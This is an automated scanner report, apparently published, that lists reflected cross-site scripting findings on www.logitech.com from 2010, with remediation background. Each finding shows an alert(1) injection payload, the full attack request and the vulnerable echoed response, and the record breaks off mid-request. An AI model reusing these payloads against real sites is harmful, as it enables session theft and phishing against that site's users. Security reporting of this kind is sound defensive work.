1.1482. http://www.logitech.com/javascript/v2/cmn/lib/plugins/third-party/sayt.js [REST URL parameter 7]

1.1483. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 1]

1.1484. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 1]

1.1485. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 2]

1.1486. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 2]

1.1487. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 3]

1.1488. http://www.logitech.com/javascript/v2/combined.js [REST URL parameter 3]

1.1489. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 1]

1.1490. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 1]

1.1491. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 2]

1.1492. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 2]

1.1493. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 3]

1.1494. http://www.logitech.com/javascript/v2/gomez.js [REST URL parameter 3]

1.1495. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 1]

1.1496. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 1]

1.1497. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 2]

1.1498. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 2]

1.1499. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 3]

1.1500. http://www.logitech.com/javascript/v2/homepage_full.js [REST URL parameter 3]

1.1501. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 1]

1.1502. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 1]

1.1503. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 2]

1.1504. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 2]

1.1505. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 3]

1.1506. http://www.logitech.com/javascript/v2/pagination.js [REST URL parameter 3]

1.1507. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 1]

1.1508. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 1]

1.1509. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 2]

1.1510. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 2]

1.1511. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 3]

1.1512. http://www.logitech.com/javascript/v2/subnavigation.js [REST URL parameter 3]

1.1513. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 1]

1.1514. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 1]

1.1515. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 2]

1.1516. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 2]

1.1517. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 3]

1.1518. http://www.logitech.com/javascript/v2/webtrends.js [REST URL parameter 3]

1.1519. http://www.logitech.com/robots.txt [REST URL parameter 1]

1.1520. http://www.logitech.com/robots.txt [REST URL parameter 1]

1.1521. http://www.logitech.com/thank_you [REST URL parameter 1]

1.1522. http://www.logitech.com/thank_you [REST URL parameter 1]



1. Cross-site scripting (reflected)
There are 1522 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.logitech.com/349/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7784</script><script>alert(1)</script>9a6e0835833 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /349f7784</script><script>alert(1)</script>9a6e0835833/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349f7784</script><script>alert(1)</script>9a6e0835833' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.2. http://www.logitech.com/349/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e226"><script>alert(1)</script>b89149fdcec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /3498e226"><script>alert(1)</script>b89149fdcec/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:01:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="3498e226"><script>alert(1)</script>b89149fdcec">
...[SNIP]...

1.3. http://www.logitech.com/349/7073 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/7073

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc92e</script><script>alert(1)</script>f5f38212be6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /349fc92e</script><script>alert(1)</script>f5f38212be6/7073 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:18 GMT
Connection: keep-alive
Content-Length: 31370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349fc92e</script><script>alert(1)</script>f5f38212be6/7073' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.d
...[SNIP]...

1.4. http://www.logitech.com/349/7073 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/7073

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b6a0"><script>alert(1)</script>abef1686553 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /3495b6a0"><script>alert(1)</script>abef1686553/7073 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:12 GMT
Connection: keep-alive
Content-Length: 31338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="3495b6a0"><script>alert(1)</script>abef1686553/7073">
...[SNIP]...

1.5. http://www.logitech.com/349/7073 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/7073

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0dae"><script>alert(1)</script>d1c78e40ff3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /349/7073b0dae"><script>alert(1)</script>d1c78e40ff3 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:19 GMT
Connection: keep-alive
Content-Length: 31338


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="349/7073b0dae"><script>alert(1)</script>d1c78e40ff3">
...[SNIP]...

1.6. http://www.logitech.com/349/7073 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /349/7073

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c909b</script><script>alert(1)</script>24401b002b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /349/7073c909b</script><script>alert(1)</script>24401b002b1 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://www.logitech.com/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.logitech.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:51:22 GMT
Connection: keep-alive
Content-Length: 31370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','349/7073c909b</script><script>alert(1)</script>24401b002b1' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.7. http://www.logitech.com/[{lclid}]/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36661"><script>alert(1)</script>1e4bdda8a64 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /[{lclid}]36661"><script>alert(1)</script>1e4bdda8a64/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:46 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]36661"><script>alert(1)</script>1e4bdda8a64">
...[SNIP]...

1.8. http://www.logitech.com/[{lclid}]/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8da1</script><script>alert(1)</script>45daf56d365 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]b8da1</script><script>alert(1)</script>45daf56d365/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:02:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]b8da1</script><script>alert(1)</script>45daf56d365' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.9. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36a45"%3b5f92b547f49 was submitted in the REST URL parameter 1. This input was echoed as 36a45";5f92b547f49 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]36a45"%3b5f92b547f49/69/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Apache
AK-control: no-store
Date: Fri, 12 Nov 2010 13:03:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script language="javascript">
       
        try {        
            var thisUrl = "www.logitech.com/[{lclid}]36a45";5f92b547f49/69";
            document.domain = "logitech.com";
           }
           catch (e) {}
   
</script>
...[SNIP]...

1.10. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11f73"><script>alert(1)</script>cf1f5a43e78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /[{lclid}]11f73"><script>alert(1)</script>cf1f5a43e78/69/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:03:00 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]11f73"><script>alert(1)</script>cf1f5a43e78/69">
...[SNIP]...

1.11. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92e2f</script><script>alert(1)</script>ab14f89b30d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]92e2f</script><script>alert(1)</script>ab14f89b30d/69/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:03:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]92e2f</script><script>alert(1)</script>ab14f89b30d/69' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcs
...[SNIP]...

1.12. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f1e8</script><script>alert(1)</script>c66fc837737 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]/691f1e8</script><script>alert(1)</script>c66fc837737/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:03:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<script type="text/javascript" language="javascript1.1">
       function multitrack_tabs(parm) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri','[{lclid}]/691f1e8</script><script>alert(1)</script>c66fc837737' ,'WT.ti','' ,'WT.pn_sku','' ,'WT.tx_e','' ,'WT.tx_u','' ,'WT.dl','80' ,'DCSext.tab',parm);
       }
       function multitrack_popup(parm1,parm2) {
           dcsMultiTrack('DCS.dcssip','www.logitech.com' ,'DCS.dcsuri
...[SNIP]...

1.13. http://www.logitech.com/[{lclid}]/69/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9923"><script>alert(1)</script>992f80526f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /[{lclid}]/69d9923"><script>alert(1)</script>992f80526f1/ HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 13:03:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]/69d9923"><script>alert(1)</script>992f80526f1">
...[SNIP]...

1.14. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a47a2"><script>alert(1)</script>d3f9bf6bc4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /[{lclid}]a47a2"><script>alert(1)</script>d3f9bf6bc4/69/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache
Date: Fri, 12 Nov 2010 12:57:19 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   
       <m
...[SNIP]...
<meta name="DCS.dcsuri" content="[{lclid}]a47a2"><script>alert(1)</script>d3f9bf6bc4/69/7112">
...[SNIP]...

1.15. http://www.logitech.com/[{lclid}]/69/7112 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logitech.com
Path:   /[{lclid}]/69/7112

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 203c0</script><script>alert(1)</script>762ee0b3a24 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /[{lclid}]203c0</script><script>alert(1)</script>762ee0b3a24/69/7112 HTTP/1.1
Host: www.logitech.com
Accept: */*
Accept-Language: en
